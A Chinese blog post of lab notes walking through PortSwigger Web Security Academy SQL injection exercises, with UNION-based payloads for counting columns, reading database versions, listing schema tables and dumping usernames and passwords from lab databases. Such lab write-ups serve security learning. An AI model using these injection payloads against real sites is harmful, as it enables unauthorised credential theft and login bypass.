portswigger之SQL注入实验室笔记

已于 2022-07-06 15:03:15 修改
阅读量1.2k 收藏 14
点赞数 1
文章标签: sql 数据库 java
于 2022-07-06 09:11:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69349614/article/details/125632326
版权
本文档详细记录了Portswigger Web安全学院的SQL注入实验室系列,涵盖了从基本的UNION攻击到复杂的盲注技巧,如通过时间延迟和带外交互来探测数据库信息。实验室涉及寻找列数、数据类型、数据库版本、表和列名,以及通过盲注获取用户凭证。通过使用Burp Suite工具,逐步解析和利用SQL注入漏洞,最终实现登录绕过。
摘要由CSDN通过智能技术生成

01 SQL 注入 UNION 攻击,查找包含文本的列

描述

该实验室在产品类别过滤器中包含一个 SQL 注入漏洞。查询的结果在应用程序的响应中返回,因此您可以使用 UNION 攻击从其他表中检索数据。这种攻击的第一步是确定查询返回的列数。然后,您将在后续实验中使用此技术来构建完整的攻击。

要解决该实验,请通过执行SQL 注入 UNION攻击来确定查询返回的列数,该攻击会返回包含空值的附加行。

解决方案

使用 Burp Suite 拦截和修改设置产品类别过滤器的请求。

修改category参数,赋予它值'+UNION+SELECT+NULL--。观察是否发生错误。

修改category参数以添加包含空值的附加列:'+UNION+SELECT+NULL,NULL--

继续添加空值,直到错误消失并且响应包括包含空值的附加内容。

'+ORDER+BY+3--

'+UNION+SELECT+NULL,NULL,NULL--

02 SQL 注入 UNION 攻击,查找包含文本的列

描述

该实验室在产品类别过滤器中包含一个 SQL 注入漏洞。查询的结果在应用程序的响应中返回,因此您可以使用 UNION 攻击从其他表中检索数据。要构建这样的攻击,首先需要确定查询返回的列数。您可以使用在之前的实验室中学到的技术来完成此操作。下一步是确定与字符串数据兼容的列。

实验室将提供您需要在查询结果中显示的随机值。为了解决实验室问题,请执行SQL 注入 UNION攻击,该攻击会返回包含所提供值的附加行。此技术可帮助您确定哪些列与字符串数据兼容。

解决方案

使用 Burp Suite 拦截和修改设置产品类别过滤器的请求。

确定查询返回的列数。使用category参数中的以下有效负载验证查询是否返回三列:'+UNION+SELECT+NULL,NULL,NULL--

尝试用实验室提供的随机值替换每个空值,例如:'+UNION+SELECT+'abcdef',NULL,NULL--

如果发生错误,请移至下一个空值并改为尝试。

任务:使数据库检索字符串:'X8VH6Z'

'+UNION+SELECT+NULL,NULL,'X8VH6Z'--

03 SQL注入UNION攻击,从其他表中检索数据

描述

该实验室在产品类别过滤器中包含一个 SQL 注入漏洞。查询的结果在应用程序的响应中返回,因此您可以使用 UNION 攻击从其他表中检索数据。要构建这样的攻击,您需要结合您在之前实验室中学到的一些技术。

数据库包含一个名为 的不同表users,其列名为usernamepassword

为解决实验室问题,执行SQL 注入 UNION攻击,检索所有用户名和密码,并使用该信息以administrator用户身份登录。

解决方案

Use Burp Suite to intercept and modify the request that sets the product category filter.

确定查询返回的列数以及哪些列包含文本数据。验证查询返回两列,它们都包含文字,使用像在类别参数以下的有效载荷:'+UNION+SELECT+'abc','def'--

使用以下有效负载检索users表的内容:'+UNION+SELECT+username,+password+FROM+users--

验证应用程序的响应是否包含用户名和密码。

使用'+UNION+SELECT+username,password+FROM+users--获取用户名密码表,得到administrator/a2t6t7m3ybo5f7cz7fja

使用得到的用户名密码登录

04 SQL 注入 UNION 攻击,在单列中检索多个值

描述

该实验室在产品类别过滤器中包含一个 SQL 注入漏洞。查询的结果在应用程序的响应中返回,因此您可以使用 UNION 攻击从其他表中检索数据。

数据库包含一个名为 的不同表users,其列名为usernamepassword

为解决实验室问题,执行SQL 注入 UNION攻击,检索所有用户名和密码,并使用该信息以administrator用户身份登录。

解决方案

使用 Burp Suite 拦截和修改设置产品类别过滤器的请求。

确定查询返回的列数以及哪些列包含文本数据。验证查询是否返回两列,其中只有一列包含文本,在category参数中使用如下所示的有效负载:'+UNION+SELECT+NULL,'abc'--

使用以下有效负载检索users表的内容:'+UNION+SELECT+NULL,username||'~'||password+FROM+users--

验证应用程序的响应是否包含用户名和密码。

'+order+by+2--判断列数为2

'+union+select+null,'aaa'--判断回显字段是第二个

'+union+select+null,username+||+'~'+||+password+FROM+users--读取密码

登录administrator~l32y00qu4gkslzqy9d0g

05 SQL注入攻击,在Oracle上查询数据库类型和版本

描述

该实验室在产品类别过滤器中包含一个SQL 注入漏洞。您可以使用 UNION 攻击从注入的查询中检索结果。

要解决实验室问题,请显示数据库版本字符串。

解决方案

使用 Burp Suite 拦截和修改设置产品类别过滤器的请求。

确定查询返回的列数以及哪些列包含文本数据。验证查询是否返回两列,这两列都包含文本,在category参数中使用如下所示的有效负载:'+UNION+SELECT+'abc','def'+FROM+dual--

使用以下有效负载显示数据库版本:'+UNION+SELECT+BANNER,+NULL+FROM+v$version--

'+ORDER+BY+2--判断列数为2

union sql注入攻击中要做的第二件事是确定列的数据类型。我们使用union空查询来做到这一点,我们已经知道有两个列,我们要做的是将int值或字符串测试每一列

' UNION SELECT 'aa', NULL--

如果该列的数据类型不兼容对于使用过滤类别的列的数据类型,它应该抛出一个错误,告诉我们该列不是字符串类型。如果我们没有收到错误,这意味着该列现在是字符串类型。

在此实验环境中,我们可以看到两列都包含字母,所以他们都是字符串类型(还是要进一步测试确认)。

测试' UNION SELECT 'aa', 'aa'--

报错Internal Server Error

可以确定我们的操作是没有问题的,我们搜索一下oracle的select语句用法oracle select statement

Oracle select语句解释https://www.oracletutorial.com/oracle-basics/oracle-select/

oracle双表解释https://www.oracletutorial.com/oracle-basics/oracle-dual-table/

在 Oracle 中,SELECT语句必须有一个FROM子句。但是,某些查询不需要任何表

Oracle 为您提供了DUAL的一个特殊的表,它属于SYS用户的模式,但所有用户都可以访问。

所以我们为union select后加上from DUAL子句

' UNION SELECT 'aa', 'aa' FROM DUAL--

显示成功

参阅我们的SQL 注入备忘单来找到Oracle数据库查询数据库版本的语句

SELECT banner FROM v$version
SELECT version FROM v$instance

所以我们的payload是

' UNION SELECT banner, 'aa' FROM v$instance--

刷新页面会显示恭喜解决

06 SQL注入攻击,在MySQL和微软上查询数据库类型和版本

描述

该实验室在产品类别过滤器中包含一个SQL 注入漏洞。您可以使用 UNION 攻击从注入的查询中检索结果。

要解决实验室问题,请显示数据库版本字符串。

解决方案

  1. Use Burp Suite to intercept and modify the request that sets the product category filter.

  2. 确定查询返回的列数以及哪些列包含文本数据。验证查询是否返回两列,这两列都包含文本,在category参数中使用如下所示的有效负载:'+UNION+SELECT+'abc','def'#

  3. 使用以下有效负载显示数据库版本:'+UNION+SELECT+@@version,+NULL#

同样的思路,先确定列数,通过网页显示内容可以猜测是2列

' ORDER BY 2--查询报错

我们的语法没有问题,这个服务器错误可能是对我们的某个符号进行了过滤,现在我们把--注释符修改为#进行测试,成功

' ORDER BY 2#查询成功

' UNION SELECT 'AAA', 'BBB'#查询

现在我们需要使用SQL注入语句查询数据库版本,查阅我们的SQL 注入备忘单,找到一些有用的有效负载

SELECT @@version

' UNION SELECT @@version, 'BBB'#

成功解决

07 SQL注入攻击,列出非Oracle数据库上的数据库内容

描述

该实验室在产品类别过滤器中包含一个SQL 注入漏洞。查询的结果在应用程序的响应中返回,因此您可以使用 UNION 攻击从其他表中检索数据。

该应用程序具有登录功能,数据库包含一个保存用户名和密码的表。您需要确定该表的名称及其包含的列,然后检索该表的内容以获取所有用户的用户名和密码。

要解决实验室,请以administrator用户身份登录。

解决方案

使用 Burp Suite 拦截和修改设置产品类别过滤器的请求。

确定查询返回的列数以及哪些列包含文本数据。验证查询是否返回两列,这两列都包含文本,在category参数中使用如下所示的有效负载:'+UNION+SELECT+'abc','def'--

使用以下有效负载检索数据库中的表列表:'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--

查找包含用户凭据的表的名称。

使用以下有效负载(替换表名)来检索表中列的详细信息:'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--

最低0.47元/天 解锁文章
m0_69349614
关注
protSwigger下的SQL注入系列--Lab1(检索隐藏的数据)
weixin_44746974的博客
10-23 483
protSwigger下的SQL注入系列–Lab1(检索隐藏的数据) 在不同情况下会出现各种SQL注入漏洞,攻击和技术。一些常见的SQL注入示例包括: 检索隐藏的数据,您可以在其中修改SQL查询以返回其他结果。 颠覆应用程序逻辑,您可以在其中更改查询以干扰应用程序的逻辑。 UNION攻击,您可以在其中从不同的数据库表中检索数据。 检查数据库,您可以在其中提取有关数据库版本和结构的信息。 盲SQL注入,其中您控制的查询结果未在应用程序的响应中返回。 第一步:进入实验,判断是否存在注入点: 1、2 开始
PortSwiggerSQL注入实验全记录
leo788的博客
05-12 968
靶场是Burp自带的网站中提供的,本篇主要对sql注入部分进行练习和记录。
portswigger靶场SQL注入实验(上)
m0_51313985的博客
09-09 3206
最近发现一个挺不错的靶场,burpsuite的官方网站在线训练平台 不多说先到第一个系列的实验去一探究竟 麻了,英文界面属实不太友好! 所以我决定用谷歌看题,火狐去操作(主要火狐用习惯了) 第一个系列的实验为SQL注入,先来简单了解一下吧。 什么是SQL注入SQL 注入是一种 Web 安全漏洞,允许攻击者干扰应用程序对其数据库进行的查询。它通常允许攻击者查看他们通常无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导
SQL注入sqli-labs靶场第三关
最新发布
aihua002的博客
08-11 510
1.主要考察闭合方式 ’ 和)2.order by 猜解字段数3.union 联合查询4.对MySQL数据库的information_schema库中的schemata,tables,columns,表的熟悉。
portswigger靶场SQL注入实验(下)
m0_51313985的博客
10-03 2490
实验9 点击了home之后页面给了回显,猜测后面进行盲注的时候要利用此回显来判断,打开bp吧 注入点在trackingid这,简单判断一下 存在注入,下面判断一下是否存在表users,表里是否存在名为administrator的用户以及密码password有多少字符 为真,存在users表,接着查用户 后面判断password的长度 大于1为真,扩大点看看 大于30无回显,长度应该是小于30的,具体多少跑一下payload吧 选择number范围1-30 到20,在确定了密码的长度之
portswigger靶场学习笔记(一)sqli注入
weixin_52835927的博客
10-08 308
在本次靶场开始联系之前,已经学习了sqli-labs,pikachu,DVWA三个靶场,在学习portswigger的时候,我准备从较为熟悉的sqli注入部分开始。
PortSwigger SQL injection
mengzh620的博客
04-14 431
4.retrieving multiple values in a single column username||‘~’||password+FROM+users-- ~是用户名和密码之间的区分,用户自己加上的。1.Retrieval of hidden data ---- Modify the category parameter, giving it the value '+OR+1=1-- 能看到所有的目录。
BurpSuit官方实验室SQL注入
tpaer的博客
11-13 5635
BurpSuit官方实验室靶场-SQL注入通关记录。
SQL注入sqli第四关(less-4)
s_xcx_ah的博客
06-10 1403
SQLI第四关
BurpSuit官方实验室之命令注入
tpaer的博客
11-14 830
这是BurpSuit官方的实验室靶场,以下将记录个人命令注入共5个Lab的通关过程。
基于深度学习的sql注入检测系统`内训练模型和推理脚本和环境搭建教程.zip
11-01
基于深度学习的sql注入检测系统`内训练模型和推理脚本和环境搭建教程 #### 有用的设置信息 (1) 每个应用程序都作为 WAR 文件分发在`/SUT/*.war`中; (2) 应用程序的数据库位于WAR 文件中。您可以在加载 SUT 后使用...
PortSwigger web实验室(BurpSuit官方靶场)之SQL注入
weixin_60677557的博客
07-05 1577
SQL注入SQLi)是一种Web安全漏洞,允许攻击者干扰应用程序对其数据库进行的查询。它通常允许攻击者查看他们通常无法检索的数据。这可能包括属于其他用户的数据,或者应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除此数据,从而导致应用程序的内容或行为发生持久更改。在某些情况下,攻击者可以升级SQL注入攻击以危及底层服务器或其他后端基础架构,或执行拒绝服务攻击。
UNION 注入
周无争的博客
09-26 758
本文翻译自:https://portswigger.net/web-security/sql-injection/union-attacks 当应用程序易受SQL注入攻击,并且查询结果在应用程序的响应中返回时,可以使用UNION关键字从数据库中的其他表中检索数据。这导致了SQL注入UNION的攻击。 UNION关键字允许您执行一个或多个附加的SELECT查询,并将结果追加到原始查询中。例如: SELECT a, b FROM table1 UNION SELECT c, d FROM table2 这个SQ
SQL注入sqli-labs第三关(less-3)
s_xcx_ah的博客
06-10 2358
sqli第三关简要步骤
burpLab——sql注入学习笔记
2201_75353421的博客
08-27 264
为了加深对sql注入的实战理解,这里我对burp官方的sql注入靶场做了一次全通关解析,针对备忘录清单也重点截取了上来,希望这篇sql注入学习笔记能对你有所帮助。
SQLI-LABS靶场第三关手工注入
x15wda33的博客
06-15 195
解答1:无法判定是否有sql注入漏洞渗透测试本身在于尝试,我们只能说具有什么漏洞的特征,根据猜测去尝试有没有,并加以证明。使用 ‘)方式可以闭合成功,这里显示列数不足,这是因为没有对应上表中的列,但可以判定闭合成功且可以使用联合查询。解答3::无法判定闭合条件是什么,除非可以看到源码,但渗透测试时几乎不会看到源码,这也是一个大胆假设小心求证的过程。这里我们不难看出当我们输入id=1,id=2时会出现类似界面的不同字段这时我们可以尝试以id作为注入点尝试注入。id=字段但是却sql注入不出来?
Burpsuite靶场——SQL注入
小林说安全的博客
05-13 4638
Burpsuite靶场——SQL注入漏洞详解,带你了解并从根源上解决SQL注入问题。
SQL注入(查询注入)
m0_61974571的博客
10-12 1754
如果使用config的认证方式,则直接进入后台,如果为http,可以进行爆破,最好不要开启phpmyadmin,或者在需要的时候再开启远程登陆,修改/opt/lampp/etc/extra/http-xampp.conf文件禁用远程访问。使用方法:https://blog.csdn.net/kikajack/article/details/80065753。上述语法主要针对mysql数据库,如果针对其他数据库,需要使用其他数据库的语法。3、Web页面中有两个SQL查询语句,查询的列数不相同。
portswigger Authentication
07-28
PortSwigger是一家网络安全公司,他们开发了一款名为Burp Suite的强大的网络安全测试工具。在Burp Suite中,有一个功能模块是用于进行身份验证测试的,即Authentication模块。这个模块可以帮助安全专业人员测试应用程序的身份验证机制的安全性。在进行身份验证测试时,可能会涉及到JSON Web Token(JWT)的使用。JWT是一种用于在网络应用之间传递信息的安全方式。然而,JWT也存在一些安全漏洞,其中一些与身份验证相关。引用\[1\]提到了一些JWT的实现缺陷,如没有正确验证签名、服务器密钥泄露等问题。引用\[2\]提到了一些可能存在的攻击,如注入自签名证书和JWT算法混乱。引用\[3\]提到了一些签名算法的安全性问题。在进行PortSwigger的Authentication模块测试时,可以关注这些JWT相关的安全问题,以帮助发现和修复应用程序中的身份验证漏洞。 #### 引用[.reference_title] - *1* *2* *3* [portswigger JWT attacks](https://blog.csdn.net/weixin_63231007/article/details/127684964)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值